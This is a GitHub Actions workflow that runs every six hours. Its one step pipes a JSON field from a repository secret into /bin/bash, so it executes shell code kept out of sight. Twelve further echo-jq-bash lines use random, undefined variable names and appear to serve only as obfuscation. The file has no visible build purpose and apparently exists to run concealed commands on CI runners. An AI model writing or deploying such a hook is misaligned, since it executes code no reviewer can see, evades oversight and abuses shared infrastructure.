name: ninboning

on:
  workflow_dispatch:
  schedule:
    - cron: '53 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: ninboning
        env:
          q00: ${{ secrets.q00 }}
        run: |
          echo $q00 | jq -r .i92 | /bin/bash
          echo $jq93552 | jq -r .tbwqs1176 | /bin/bash
          echo $vsu06 | jq -r .lh664 | /bin/bash
          echo $jqit2 | jq -r .dp7043 | /bin/bash
          echo $z219 | jq -r .cyk6826 | /bin/bash
          echo $caacj659 | jq -r .q075 | /bin/bash
          echo $yrwu9 | jq -r .pzatw95 | /bin/bash
          echo $zma8 | jq -r .vrsd90 | /bin/bash
          echo $org729 | jq -r .vbk0667 | /bin/bash
          echo $wvx375 | jq -r .fynqk9682 | /bin/bash
          echo $la5 | jq -r .sn45718 | /bin/bash
          echo $aybda4 | jq -r .c2 | /bin/bash
          echo $u9589 | jq -r .p97597 | /bin/bash

